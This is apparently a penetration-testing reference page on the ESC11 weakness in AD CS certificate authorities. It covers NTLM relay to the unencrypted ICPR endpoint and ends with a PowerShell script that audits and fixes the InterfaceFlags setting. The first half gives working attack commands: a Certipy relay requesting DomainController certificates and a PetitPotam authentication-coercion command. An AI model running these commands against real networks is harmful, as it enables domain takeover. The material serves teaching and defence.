ESC11
The vulnerability identified as ESC11 arises when the IF_ENFORCEENCRYPTICERTREQUEST flag is absent from the InterfaceFlags of the MS-ICPR RPC interface of an AD CS certificate authority. Without that flag the CA accepts certificate requests over unencrypted RPC sessions, which potentially allows an NTLM relay attack against the AD CS ICPR endpoint: coerced SMB NTLM authentication is relayed over RPC/ICPR with tools such as ntlmrelayx.py or Certipy, and if the relay succeeds the attacker can enroll for certificates from templates the relayed account is authorized to use.
Linux
Abusing ESC11 with Certipy
bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController
Coerce authentication with PetitPotam
bob$ python3 PetitPotam.py -u <user> -p <pass> -d <domain> <target_ip_address> <listener_address>
Certipy receiving authentication from LAB-DC$
bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController
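The flag the relay above depends on is a single bit in the CA's InterfaceFlags registry value, so exposure can be audited and fixed from the CA host. The script below is an added example, not part of the original page or of Certipy; it assumes it runs on the CA server as a local administrator and that the hypothetical -Fix switch is used only when the change has been approved.

```powershell
# Added example, not part of the original page: check whether the local CA sets
# IF_ENFORCEENCRYPTICERTREQUEST (bit 0x200 of InterfaceFlags) and, with -Fix,
# apply the standard ESC11 remediation. Assumes it runs on the CA server as a
# local administrator.
param([switch]$Fix)

$IF_ENFORCEENCRYPTICERTREQUEST = 0x200
$ConfigRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration'

function Test-Esc11Exposure {
    # The 'Active' value names the CA instance; its own subkey holds InterfaceFlags.
    $caName = (Get-ItemProperty -Path $ConfigRoot -Name Active).Active
    $flags  = (Get-ItemProperty -Path "$ConfigRoot\$caName" -Name InterfaceFlags).InterfaceFlags
    [pscustomobject]@{
        CA                    = $caName
        InterfaceFlags        = '0x{0:X}' -f $flags
        EnforcesEncryptedIcpr = [bool]($flags -band $IF_ENFORCEENCRYPTICERTREQUEST)
    }
}

$result = Test-Esc11Exposure
$result | Format-List

if (-not $result.EnforcesEncryptedIcpr) {
    Write-Warning "$($result.CA) accepts unencrypted ICPR requests (ESC11 exposure)."
    if ($Fix) {
        # certutil acts on the local CA by default; the service must restart
        # before the new InterfaceFlags value is honoured.
        certutil -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST
        Restart-Service -Name CertSvc
    }
}
```

The same value can be read from another domain machine with `certutil -config "<ca_host>\<ca_name>" -getreg CA\InterfaceFlags`, which prints the raw DWORD together with the decoded flag names. Note that this flag only governs the RPC (ICPR) interface; the HTTP enrollment endpoints are a separate issue (ESC8).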